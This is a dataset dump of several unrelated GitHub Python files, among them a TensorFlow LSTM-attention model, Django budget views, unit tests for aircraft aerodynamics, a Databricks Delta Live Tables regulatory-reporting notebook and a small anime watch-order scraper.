lstm_output[:,:,:,-1,:] #bs*seq*5*64\r\n lstm_output = tf.expand_dims(lstm_output,axis=3)\r\n\r\n return lstm_output # outputs: [batch_sie, sequence_len, 5, 3, 64]\r\n \r\n def attn_layer1(self, inputs): #定义底层attention,对三帧的特征进行归纳。\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 3, 64]\r\n output: [batch_sie, sequence_len, 5, 64]\r\n \"\"\"\r\n with tf.variable_scope('layer1'):\r\n shape = inputs.get_shape().as_list()\r\n batch_size, sequence_len, split_num, dim = shape[0], shape[1], shape[2], shape[4]\r\n output = tf.layers.dense(inputs, units=dim, activation='tanh') # output: [batch_sie, sequence_len, 5, 3, 64]\r\n output = tf.nn.softmax(tf.layers.dense(output, units=1, activation=None)) # output: [batch_sie, sequence_len, 5, 3, 1]\r\n output = tf.matmul(output, inputs, transpose_a=True) # output: [batch_sie, sequence_len, 5, 1, 64]\r\n output = tf.squeeze(output, squeeze_dims=3) # output: [batch_sie, sequence_len, 5, 64]\r\n \r\n return output\r\n\r\n def lstm_layer2(self, inputs): #语义层\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 64]\r\n ouput: [batch_sie, sequence_len, 5, 128]\r\n \"\"\"\r\n # print(inputs.get_shape())\r\n with tf.variable_scope('layer2'):\r\n shape = tf.shape(inputs)\r\n dim1, dim2, dim3 = shape[0], shape[1], shape[2]\r\n\r\n inputs = tf.reshape(inputs, [dim1*dim2, dim3, 64]) # [batch_sie * sequence_len, 5, 64]\r\n lstm_output, _ = lstm_layer(inputs, 128, dim1*dim2)\r\n lstm_output = tf.reshape(lstm_output, [dim1, dim2, dim3, 128])\r\n \r\n return lstm_output\r\n\r\n def attn_layer2(self, inputs):\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 128]\r\n ouput: [batch_sie, sequence_len, 128]\r\n \"\"\"\r\n with tf.variable_scope('layer2'):\r\n shape = inputs.get_shape().as_list()\r\n dim1, dim2, dim3, dim4 = shape[0], shape[1], shape[2], shape[3]\r\n output = tf.layers.dense(inputs, units=dim4, activation='tanh') # output: [batch_sie, sequence_len, 5, 128]\r\n output = tf.nn.softmax(tf.layers.dense(output, units=1, activation=None)) # output: [batch_sie, sequence_len, 5, 1]\r\n output = tf.matmul(output, inputs, transpose_a=True) # output: [batch_sie, sequence_len, 1, 128]\r\n output = tf.squeeze(output, squeeze_dims=2) # output: [batch_sie, sequence_len, 128]\r\n\r\n return output\r\n\r\n def lstm_layer3(self, inputs): # 字与字层面的连接\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 256]\r\n output: [batch_sie, sequence_len, 256]\r\n \"\"\"\r\n with tf.variable_scope('layer3'):\r\n shape = tf.shape(inputs)\r\n batch_size = shape[0]\r\n\r\n lstm_output, _ = lstm_layer(inputs, 256, batch_size) \r\n\r\n return lstm_output\r\n \r\n def mlp_layer(self, inputs): #(sequence loss层)\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 256]\r\n output: [batch_sie, sequence_len, 30]\r\n \"\"\"\r\n with tf.variable_scope('top_layer'):\r\n output = tf.layers.dense(inputs, units=128, activation='tanh') # [batch_sie, sequence_len, 128]\r\n output = tf.layers.dense(output, units=30, activation=None) # [batch_sie, sequence_len, 30]\r\n \r\n return output\r\n\r\n def build_model(self):\r\n inputs, labels = self.set_placeholder()\r\n\r\n # ====== build your own model ======\r\n\r\n lstm_layer1_output = self.lstm_layer1(inputs) # output: [batch_sie, sequence_len, 5, 3, 64]\r\n attn_layer1_output = self.attn_layer1(lstm_layer1_output) # output: [batch_sie, sequence_len, 5, 64]\r\n lstm_layer2_output = self.lstm_layer2(attn_layer1_output) # output: [batch_sie, sequence_len, 5, 128]\r\n attn_layer2_output = self.attn_layer2(lstm_layer2_output) # output: [batch_sie, sequence_len, 128]\r\n lstm_layer3_output = self.lstm_layer3(attn_layer2_output) # output: [batch_sie, sequence_len, 256]\r\n model_output = self.mlp_layer(lstm_layer3_output)\r\n self.model_output = model_output\r\n\r\n print('flag5')\r\n print(self.model_output.get_shape(),labels.get_shape())\r\n\r\n self.rse = tf.norm(self.model_output - labels)/tf.norm(labels)\r\n self.loss = tf.losses.mean_squared_error(self.model_output , labels)\r\n\r\n # ====== build your own model ======\r\n\r\n\r\n self.params = tf.trainable_variables()\r\n self.optimize, self.islfGrad = super(DMAN, self).optimize_normal(\r\n self.loss, self.params)\r\n\r\n\r\n def train(self, sess, train_data, test_data, saver): #训练过程就是减少loss,更新网络的权重\r\n\r\n # aa = np.append(np.zeros([1,17,29]),np.zeros([1,13,29]),axis=1)\r\n\r\n # 分割数据\r\n bt = batcher(train_data, batch_size=self.batch_size,seq_len=self.seqlen,all_block_len=self.all_block_len,history_num = self.history_num)\r\n print(\"-------------begin train------------------\")\r\n min_loss = 9999\r\n cnt = 0\r\n for t_round in range(self.epoch):\r\n loss = []\r\n while(1):\r\n if not bt.has_next():\r\n break\r\n \r\n batch_input, batch_label = bt.next_batch() # [batch_size, dequnce_len, 29]\r\n \r\n # print('flag2')\r\n # print(np.shape(batch_input))\r\n # print(np.shape(batch_label))\r\n\r\n batch_input = input_prepare(batch_input, self.all_block_len) # [batch_size, sequence_len,15, 29]\r\n \r\n # print('flag2.1')\r\n # print(np.shape(batch_input))\r\n # print(np.shape(batch_label))\r\n\r\n feed_dict = {\r\n self.inputs: batch_input,\r\n self.labels: batch_label\r\n }\r\n\r\n # print('flag4')\r\n # print(np.shape(batch_label))\r\n # # print(batch_input)\r\n # tmpp=tf.shape(self.labels)\r\n # print(self.labels.get_shape())\r\n # print(tmpp[0],tmpp[1],tmpp[2])\r\n # batch_input = np.array(batch_input)\r\n # print(type(batch_input),type(batch_label))\r\n # # print(batch_input)\r\n crt_loss, rse, optimize = sess.run([self.loss, self.rse, self.optimize], feed_dict=feed_dict)\r\n loss.append(crt_loss)\r\n # print(lstm.shape)\r\n\r\n mean_loss = np.mean(loss)\r\n rse = np.mean(rse)\r\n print(\"\\nEpoch{}\\ttain-l2loss: {:.6f}, rse: {:.6f}\".format(t_round, mean_loss, rse))\r\n if min_loss > mean_loss:\r\n min_loss = mean_loss\r\n self.save_model(sess, self.model_save_path, self.model_name, saver)\r\n print(\"testing....\")\r\n if t_round%20==0:\r\n self.test(sess, test_data, saver)\r\n cnt += 1\r\n\r\n\r\n def test(self, sess, test_data, saver): # fm_y = sess.run([self.model_output], feed_dict=feed_dict) 就是model.predict,其他是评估 \r\n data_inputs = test_data.inputs\r\n data_labels = test_data.labels\r\n data_names = test_data.names\r\n\r\n # print('falg10: ',data_labels)\r\n if data_labels==0:\r\n # print('flag11')\r\n sh = np.shape(data_inputs)\r\n data_labels = np.zeros([sh[0],sh[1],30])\r\n # print(np.shape(data_labels))\r\n\r\n for i in range(len(data_inputs)):\r\n sequence_len = len(data_inputs[i])\r\n batch_input = np.expand_dims(data_inputs[i], 0) # [1, sequence_len(3600), 29]\r\n batch_label = np.expand_dims(data_labels[i], 0)\r\n name = data_names[i]\r\n\r\n print('flag8.1',np.array(batch_input).shape)\r\n\r\n batch_input = np.concatenate((np.zeros([1,self.history_num,29]),batch_input,np.zeros([1,self.all_block_len-self.history_num-1,29])),axis=1)\r\n sequence_len = sequence_len\r\n\r\n inputs = [input_prepare(batch_input[:, j:j+self.seqlen+self.all_block_len-1, :], self.all_block_len)[0] for j in range(sequence_len-self.seqlen+1)] # [3571, 30, 15, 29]\r\n labels = [batch_label[:, j:j+self.seqlen, :][0] for j in range(sequence_len-self.seqlen+1)] # [3571, 30, 30]\r\n print(np.array(batch_input).shape)\r\n print(np.array(inputs).shape)\r\n print(np.array(labels).shape)\r\n feed_dict = {\r\n self.inputs: inputs, # [3571, 30, 15, 29]\r\n self.labels: labels # [3571, 30, 30]\r\n }\r\n fm_y = sess.run([self.model_output], feed_dict=feed_dict) # [1, 3571, 30, 30]\r\n fm_y = output_handle(fm_y[0])\r\n los = npl.norm(fm_y-data_labels[i])/npl.norm(data_labels[i])\r\n print(\"test {}-loss: {:.6f}\".format(name, los))\r\n super(DMAN, self).save_fmy(sess, self.fmy_output_path, fm_y, name, self.gpu_num, self.model_name)\r\n\r\n\r\n def testonly(self, sess, test_data, saver): #只predict,不评估\r\n data_inputs = test_data.inputs\r\n data_names = test_data.names\r\n\r\n for i in range(len(data_inputs)):\r\n sequence_len = len(data_inputs[i])\r\n batch_input = np.expand_dims(data_inputs[i], 0) # [1, sequence_len(3600), 29]\r\n name = data_names[i]\r\n\r\n print('flag8.1',np.array(batch_input).shape)\r\n\r\n batch_input = np.concatenate((np.zeros([1,self.history_num,29]),batch_input,np.zeros([1,self.all_block_len-self.history_num-1,29])),axis=1)\r\n sequence_len = sequence_len\r\n\r\n inputs = [input_prepare(batch_input[:, j:j+self.seqlen+self.all_block_len-1, :], self.all_block_len)[0] for j in range(sequence_len-self.seqlen+1)] # [3571, 30, 15, 29]\r\n \r\n print(np.array(batch_input).shape)\r\n print(np.array(inputs).shape)\r\n feed_dict = {\r\n self.inputs: inputs#, # [3571, 30, 15, 29]\r\n #self.labels: labels # [3571, 30, 30]\r\n }\r\n fm_y = sess.run([self.model_output], feed_dict=feed_dict) # [1, 3571, 30, 30]\r\n fm_y = output_handle(fm_y[0])\r\n # los = npl.norm(fm_y-data_labels[i])/npl.norm(data_labels[i])\r\n print(\"test {}-loss: {:.6f}\".format(name, -1.0))\r\n super(DMAN, self).save_fmy(sess, self.fmy_output_path, fm_y, name, self.gpu_num, self.model_name)\r\n\r\n","repo_name":"zpy78987/Virbot-Deecamp","sub_path":"dmc7_seq15_block6x5_20190810/model/DMAN.py","file_name":"DMAN.py","file_ext":"py","file_size_in_byte":13825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42011925639","text":"# vim:ts=4:et\n# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport os\n\nimport bpy\n\nfrom .operators import OBJECT_OT_add_ksp_prop\n\ndef add_prop_menu_func(self, context):\n layout = self.layout\n if len(OBJECT_OT_add_ksp_prop._enum_item_cache) > 10:\n layout.operator_context = 'INVOKE_REGION_WIN'\n layout.operator(OBJECT_OT_add_ksp_prop.bl_idname,\n text=\"KSP Prop...\",\n icon='OUTLINER_OB_GROUP_INSTANCE')\n else:\n layout.operator_menu_enum(OBJECT_OT_add_ksp_prop.bl_idname,\n \"prop_item\", text=\"KSP Prop\",\n icon='OUTLINER_OB_GROUP_INSTANCE')\n\nmenus_to_register = (\n (bpy.types.VIEW3D_MT_add, add_prop_menu_func),\n)\n","repo_name":"taniwha/io_object_mu","sub_path":"prop/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"32"} +{"seq_id":"32143469643","text":"import numpy as np\n\nfrom BlochSolver.QuantumSolvers.rotations import rotation_handler as rh\n\n\nclass NumericalMethods:\n\n n_shape = None\n dt = None\n h_bar = None\n h_k = None\n idn_num = None\n j_max = None\n j_min = None\n\n @classmethod\n def load_numerical_settings(cls, control_hamiltonian: np.array, settings: dict, num_settings: dict) -> None:\n cls.dt = settings[\"pulse_time\"]\n cls.h_bar = settings[\"h_bar\"]\n cls.idn_num = num_settings[\"identities\"]\n cls.h_k = control_hamiltonian\n cls.j_min = rh.RotationHandler.get_pulse_detuning(num_settings[\"e_min\"])\n cls.j_max = rh.RotationHandler.get_pulse_detuning(num_settings[\"e_max\"])\n return\n\n @classmethod\n def get_inverse_matrix(cls, matrix: np.array):\n return np.linalg.inv(matrix)\n\n @classmethod\n def get_commutator(cls, operator_a: np.array, operator_b: np.array):\n return np.dot(operator_a, operator_b) - np.dot(operator_b, operator_a)\n\n @classmethod\n def get_matrix_product(cls, operator_a: np.array, operator_b: np.array):\n return np.trace(np.dot(np.conj(operator_a.T), operator_b))\n\n @classmethod\n def get_gradient(cls, back_operators: np.array, forward_operators: np.array):\n grad = np.array(\n [-1 * cls.get_matrix_product(back_op, 1j * cls.dt * cls.get_commutator(cls.h_k, fwd_op))\n if k < cls.n_shape - cls.idn_num\n else -1 * cls.get_matrix_product(back_op, 1j * cls.dt * cls.get_commutator(rh.RotationHandler.idn, fwd_op))\n for k, (back_op, fwd_op) in enumerate(zip(back_operators, forward_operators))])\n return np.real(grad)\n\n @classmethod\n def get_penalty_gradient(cls, backward_operators: np.array, forward_operators: np.array, detunings: np.array):\n penalty_gradient = np.array(\n [-1 * cls.get_matrix_product(back_op, 1j * cls.dt * cls.get_commutator(cls.h_k, fwd_op)) -\n cls.__get_penalty(detunning) if k < cls.n_shape - cls.idn_num\n else\n -1 * cls.get_matrix_product(back_op,\n 1j * cls.dt * cls.get_commutator(rh.RotationHandler.idn,\n fwd_op)) -\n cls.__get_penalty(detunning)\n for k, (back_op, fwd_op, detunning) in enumerate(zip(backward_operators, forward_operators, detunings))])\n return np.real(penalty_gradient)\n\n @classmethod\n def get_propagator_gradient(cls, backward_propagator: np.array, forward_propagator: np.array):\n propagator_gradient = np.array(\n [-1 * cls.get_matrix_product(back_prop, 1j * cls.dt * rh.RotationHandler.get_dot_product(cls.h_k, fwd_prop))\n if k < cls.n_shape - cls.idn_num else\n -1 * cls.get_matrix_product(back_prop, 1j * cls.dt *\n rh.RotationHandler.get_dot_product(rh.RotationHandler.idn, fwd_prop))\n for k, (back_prop, fwd_prop) in enumerate(zip(backward_propagator, forward_propagator))])\n return np.real(propagator_gradient)\n\n @classmethod\n def get_penalty_propagator_gradient(cls, backward_propagator: np.array,\n forward_propagator: np.array, detunings: np.array):\n propagator_gradient = np.array(\n [-1 * cls.get_matrix_product(back_prop, 1j * cls.dt * rh.RotationHandler.get_dot_product(cls.h_k, fwd_prop))\n - cls.__get_penalty(detunning) if k < cls.n_shape - cls.idn_num else\n -1 * cls.get_matrix_product(back_prop, 1j * cls.dt *\n rh.RotationHandler.get_dot_product(rh.RotationHandler.idn, fwd_prop))\n - cls.__get_penalty(detunning) for k, (back_prop, fwd_prop, detunning)\n in enumerate(zip(backward_propagator, forward_propagator, detunings))])\n return np.real(propagator_gradient)\n\n @classmethod\n def __get_penalty(cls, j: float):\n if j > cls.j_max:\n return (j - cls.j_max) ** 6 # np.log(np.abs(j-(1+cls.j_max)))\n elif j < cls.j_min:\n return (cls.j_min - j) ** 6 # np.log(-(j - (1+cls.j_min)))\n else:\n return 0\n\n @classmethod\n def get_density_operator(cls, vector_a: np.array):\n return np.outer(vector_a, np.conj(vector_a))\n\n @classmethod\n def get_hermit_sequence(cls, operator_sequence: np.array):\n return np.array([np.conj(operator.T) for operator in operator_sequence])\n","repo_name":"prz3m37/RandomBenchmarking","sub_path":"BlochSolver/QuantumSolvers/numerics/numerical_methods.py","file_name":"numerical_methods.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71422335131","text":"import unittest\nfrom Skymaster.aircraft import Aircraft\nimport os\n\nclass TestJson(unittest.TestCase):\n def test_readjson(self):\n \"\"\"\n Test that the loading works\n \"\"\"\n this_folder = os.path.dirname(os.path.abspath(__file__))\n file_path = os.path.join(this_folder, \"aircraft_data_test.json\")\n obj = Aircraft.fromjsonfile(file_path)\n self.assertEqual(obj.data_dict, { \"aspect ratio\": \"7.18\", \"wingspan\": \"11.63\", \"dihedral\": \"3\",\n \"oswald efficiency\": \"0.8\", \"top speed 1\": {\"weight\": \"4630\",\"speed\" : \"199\"},\n \"top speed 2\": {\"weight\": \"4200\", \"speed\" : \"200\"}})\n\nclass Test_comp_CD0(unittest.TestCase):\n def test_comp_CDO(self):\n \"\"\"\n Testing the computation of CDO in the comp_CDO function\n \"\"\"\n A = 8\n CL = 1\n e = 0.8\n CD = 0.4\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CD0(CL, A, e, CD), 0.3503, places=4)\n\nclass Test_comp_CL_EOM(unittest.TestCase):\n def test_comp_CL_EOM(self):\n \"\"\"\n Testing the computation of CL in the comp_CL_EOM function\n \"\"\"\n Weight = 1000 # N\n rho = 1.04\n V = 50\n S = 10\n\n CL = 0.076923\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CL_EOM(Weight, rho, V, S), CL, places=4)\n\nclass Test_comp_CD_polar(unittest.TestCase):\n def test_comp_CD_polar(self):\n \"\"\"\n Testing the computation of CD in the comp_CD_polar function\n \"\"\"\n A = 8\n CL = 1\n e = 0.8\n CD_0 = 0.03\n\n CD = 0.0797359\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CD_polar(CL, CD_0, A, e), CD, places=4)\n\nclass Test_comp_CD_EOM(unittest.TestCase):\n def test_comp_CD_EOM(self):\n \"\"\"\n Testing the computation of CD in the comp_CD_EOM function\n \"\"\"\n thrust = 100\n rho = 1.04\n V = 50\n S = 10\n\n CD = 0.0076923\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CD_EOM(thrust, rho, V, S), CD, places=4)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fredrhen/DSE_25","sub_path":"test/test_aircraft.py","file_name":"test_aircraft.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25448196839","text":"# Databricks notebook source\n# MAGIC %pip install dbl-waterbear==0.1.1\n\n# COMMAND ----------\n\ntry:\n # the name of the fire entity we want to process\n fire_entity = spark.conf.get(\"fire.entity\")\nexcept:\n raise Exception(\"Please provide [fire.entity] as job configuration\")\n \ntry:\n # where new data file will be received\n fire_event_dir = spark.conf.get(\"fire.events.dir\")\nexcept:\n raise Exception(\"Please provide [fire.events.dir] as job configuration\")\n \ntry:\n # where we can find fire data model\n fire_model = spark.conf.get(\"fire.model.dir\")\nexcept:\n raise Exception(\"Please provide [fire.model.dir] as job configuration\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC We retrieve the name of the entity to get the FIRE data model for as well as the directory (distributed file storage) where we expect new raw files to land. These parameters are passed to the delta live table notebook via job configuration as per the screenshot above.\n\n# COMMAND ----------\n\nfrom pyspark.sql import functions as F\nfrom pyspark.sql.functions import udf\nimport dlt\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Schematizing\n# MAGIC Even though records may sometimes \"look\" structured (e.g. JSON files), enforcing a schema is not just a good practice; in enterprise settings, and especially relevant in the space of regulatory compliance, it guarantees any missing field is still expected, unexpected fields are discarded and data types are fully evaluated (e.g. a date should be treated as a date object and not a string). Using FIRE pyspark module, we retrieve the spark schema required to process a given FIRE entity (e.g. collateral) that we apply on a stream of raw records. This process is called data schematization.\n\n# COMMAND ----------\n\nfrom waterbear.convertor import JsonSchemaConvertor\nfire_schema, fire_constraints = JsonSchemaConvertor(fire_model).convert(fire_entity)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Our first step is to retrieve files landing to a distributed file storage using Spark auto-loader (though this framework can easily be extended to read different streams, using a Kafka connector for instance). In continuous mode, files will be processed as they land, `max_files` at a time. In triggered mode, only new files will be processed since last run. Using Delta Live Tables, we ensure the execution and processing of delta increments, preventing organizations from having to maintain complex checkpointing mechanisms to understand what data needs to be processed next; delta live tables seamlessly handles records that haven't yet been processed, first in first out.\n\n# COMMAND ----------\n\n@dlt.create_table()\ndef bronze():\n return (\n spark\n .readStream\n .format('json')\n .schema(fire_schema)\n .load(f'{fire_event_dir}/{fire_entity}')\n )\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Expectations\n# MAGIC Applying a schema is one thing, enforcing its constraints is another. Given the schema definition of a FIRE entity, we can detect if a field is required or not. Given an enumeration object, we ensure its values consistency (e.g. country code). In addition to the technical constraints derived from the schema itself, the FIRE model also reports business expectations using e.g. `minimum`, `maximum`, `maxItems` JSON parameters. All these technical and business constraints will be programmatically retrieved from the FIRE model and interpreted as a series of SQL expressions. \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Our pipeline will evaluate our series of SQL rules against our schematized dataset (i.e. reading from Bronze), dropping record breaching any of our expectations through the `expect_all_or_drop` pattern and reporting on data quality in real time (note that one could simply flag records or fail an entire pipeline using resp. `expect_all` or `expect_all_or_fail`). At any point in time, we have clear visibility in how many records were dropped prior to landing on our silver layer.\n\n# COMMAND ----------\n\n@dlt.create_table()\n@dlt.expect_all_or_drop(fire_constraints)\ndef silver():\n return dlt.read_stream(\"bronze\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Invalid records\n# MAGIC In this example, we made the choice to explicitly isolate invalid from valid records to ensure 100% data quality of regulatory data being transmitted. But in order to ensure full compliance (quality AND volume), we should also redirect invalid records to a quarantine table that can be further investigated and replayed if needed.\n\n# COMMAND ----------\n\n@udf('array')\ndef violations(xs, ys):\n return [ys[i] for i, x in enumerate(xs) if not x]\n \nconstraints_expr = F.array([F.expr(x) for x in fire_constraints.values()])\nconstraints_name = F.array([F.lit(x) for x in fire_constraints.keys()])\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Using a simple user defined function, we add an additional field to our original table with the name(s) of failed SQL expressions. The filtered output is sent to a quarantine table so that the union of quarantine and silver equals the volume expected from our bronze layer.\n\n# COMMAND ----------\n\n@dlt.create_table()\ndef quarantine():\n return (\n dlt\n .read_stream(\"bronze\")\n .withColumn(\"_fire\", violations(constraints_expr, constraints_name)) \\\n .filter(F.size(\"_fire\") > 0)\n )\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Take away\n# MAGIC Finally, our pipeline has been orchestrated between Bronze, Silver and Quarantine, ensuring reliability in the transmission and validation of regulatory reports as new records unfold. As represented in the screenshot below, risk analysts have full visibility around number of records being processed in real time. In this specific example, we ensured that our collateral entity is exactly 92.2% complete (quarantine handles the remaining 8%).\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC In the next section, we will demonstrate how organizations can create a simple operation data store to consume delta live tables metrics in real time, as new regulatory data is transmitted. Finally, we will demonstrate how delta sharing capability can ensure integrity in the reports beeing exchanged between FSIs and regulatory bodies.\n","repo_name":"databricks-industry-solutions/reg-reporting","sub_path":"01_fire_dlt.py","file_name":"01_fire_dlt.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8435375318","text":"from django.shortcuts import render\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView\nfrom .models import Budget, Transaction\nfrom .forms import BudgetForm, TransactionForm\n\n\nclass BudgetListView(LoginRequiredMixin, ListView):\n template_name = 'budget/budget_list.html'\n context_object_name = 'budgets'\n login_url = reverse_lazy('login')\n\n def get_queryset(self):\n return Budget.objects.filter(user__username=self.request.user.username)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['budgets'] = Budget.objects.filter(\n user__username=self.request.user.username)\n return context\n\n\nclass BudgetDetailView(LoginRequiredMixin, DetailView):\n template_name = 'budget/budget_detail.html'\n model = Transaction\n context_object_name = 'transactions'\n login_url = reverse_lazy('login')\n pk_url_kwarg = 'id'\n\n def get_queryset(self):\n return Transaction.objects.filter(\n budget__id=self.kwargs[self.pk_url_kwarg])\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['transactions'] = Transaction.objects.filter(\n budget__id=self.kwargs[self.pk_url_kwarg])\n return context\n\n\nclass BudgetCreateView(LoginRequiredMixin, CreateView):\n template_name = 'budget/budget_create.html'\n model = Budget\n form_class = BudgetForm\n success_url = reverse_lazy('budget_list_view')\n login_url = reverse_lazy('auth_login')\n\n def form_valid(self, form):\n \"\"\"Validate form data.\"\"\"\n form.instance.user = self.request.user\n return super().form_valid(form)\n\n\nclass TransactionCreateView(LoginRequiredMixin, CreateView):\n template_name = 'budget/transaction_create.html'\n model = Transaction\n form_class = TransactionForm\n success_url = reverse_lazy('budget_list_view')\n login_url = reverse_lazy('auth_login')\n\n def form_valid(self, form):\n \"\"\"Validate form data.\"\"\"\n form.instance.user = self.request.user\n return super().form_valid(form)\n","repo_name":"scott-currie/budget_tool","sub_path":"budgets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31863755381","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup as soup\n\ndef watchsearch(st):\n index = {}\n for i in range(1, 6):\n link = \"https://chiaki.site/?/tools/watch_order_groups/type/popular/page/\" + str(i)\n req = requests.get(link, headers={'User-Agent': 'Mozilla/5.0'})\n sou = soup(req.content, \"html.parser\")\n inde = sou.find_all('td', class_='uk-text-truncate')\n for j in range(len(inde)):\n x = inde[j].find(\"a\").getText()\n y = \"https://chiaki.site/\" + inde[j].find(\"a\").attrs[\"href\"]\n index[x] = y\n ret = {}\n keys = list(index.keys())\n for i in range(len(keys)):\n ch = re.sub(\"\\W+\",\"\",keys[i])\n st = re.sub(\"\\W+\",\"\",st)\n if st.lower() in ch.lower():\n ret[keys[i]] = index[keys[i]]\n return ret\n","repo_name":"nkkun/animebot","sub_path":"watchorder.py","file_name":"watchorder.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17522243644","text":"import random\nimport numpy as np\n\ndef epsilon_greedy(epsilon, num_actions, s, Q_pi):\n \"\"\"\n Samples an action for a given state following e-greedy policy based on the given Q(s,a)\n :param epsilon: e small\n :param num_actions: number of actions in environment\n :param s: state\n :param Q_pi: [num_states x num_actions] sized matrix of the action value function\n :return a_greedy[0]: the greedy action\n \"\"\"\n # Identify greedy action\n greedy = np.argmax(Q_pi[s][:])\n\n # Compute epsilon greedy probabilities\n weights = np.ones(num_actions)*epsilon/num_actions\n weights[greedy] = 1-epsilon+epsilon/num_actions\n\n # Choose action with epsilon greedy weights\n a_greedy = random.choices(range(num_actions), weights=weights, k=1)\n return a_greedy[0]\n\n\n\n\ndef epsilon_greedy_pi_star(num_states, Q_pi):\n \"\"\"\n Computes the e-greedy policy for a given Q(s,a) with no samplings\n :param num_states: number of states in env\n :param Q_pi: [num_states x num_actions] sized matrix of the action value function\n :return pi_star: [num_actions] array of optimal policy for each state\n \"\"\"\n pi_star = np.zeros(num_states)\n # Loop over all states\n for s in range(num_states):\n # Identify greedy action\n greedy = np.argmax(Q_pi[s][:])\n pi_star[s] = greedy\n\n return pi_star","repo_name":"uiuc-ae598-rl-2023-spring/hw1-dp-calkins7","sub_path":"epsilon_greedy.py","file_name":"epsilon_greedy.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8474243216","text":"from django.urls import path\nfrom .import views\n\nurlpatterns =[\n path('', views.home, name='home'),\n path('accounts/signup/', views.signup, name='signup'),\n # videos views\n # path('videos/', views.videos_index, name='index'),\n path('videos/private_index/', views.private_index, name='private_index'),\n path('videos/create/', views.videos_create, name='videos_create'),\n path('videos//update', views.videos_update,name='videos_update'),\n path('videos//delete', views.videos_delete,name='videos_delete'),\n path('experience/drawing', views.drawing, name='drawing'),\n path('experience/touch', views.touch, name='touch'),\n path('experience/control', views.control, name='control') \n \n]","repo_name":"flawgical/movewithabandon","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34460342616","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport skimage\nimport numpy as np\nfrom skimage import io\nfrom skimage import transform\nfrom Net import conv_nn_plates_light\nfrom PIL import Image\n\nIMG_WIDTH = conv_nn_plates_light.IMG_WIDTH\nIMG_HEIGHT = conv_nn_plates_light.IMG_HEIGHT\nPATH = 'E:/Study/Mallenom/test.jpg'\n\n\ndef normalize(image):\n return image[0:] / 255\n\n\ndef read(path):\n image = io.imread(path)\n return skimage.img_as_float(image)\n\n\ndef read_and_normalize(path):\n image = transform.resize(read(path), [IMG_HEIGHT, IMG_WIDTH, conv_nn_plates_light.CHANNELS], mode='reflect')\n return image\n\n\ndef show_image(image, coords, width, height, original=None):\n fig, ax = plt.subplots(1)\n\n ax.imshow(image)\n\n coords = decode_rect(coords, width, height)\n rect = patches.Rectangle(\n (coords[0], coords[1]), coords[2] - coords[0], coords[3] - coords[1], linewidth=1,\n edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n\n\n if original != None:\n original = decode_rect(original, width, height)\n r = patches.Rectangle(\n (original[0], original[1]), original[2] - original[0], original[3] - original[1],\n linewidth=1, edgecolor='b', facecolor='none')\n ax.add_patch(r)\n\n plt.show()\n\n\ndef decode_rect(coords, width, height):\n result = np.copy(coords)\n for i in range(0, len(coords)):\n if i % 2 == 0:\n result[i] = int(width * coords[i])\n else:\n result[i] = int(height * coords[i])\n\n return result\n\n# image = read(PATH)\n# img = skimage.img_as_float(image)\n# im = np.array(img)\n# a = np.reshape(img, 480 * 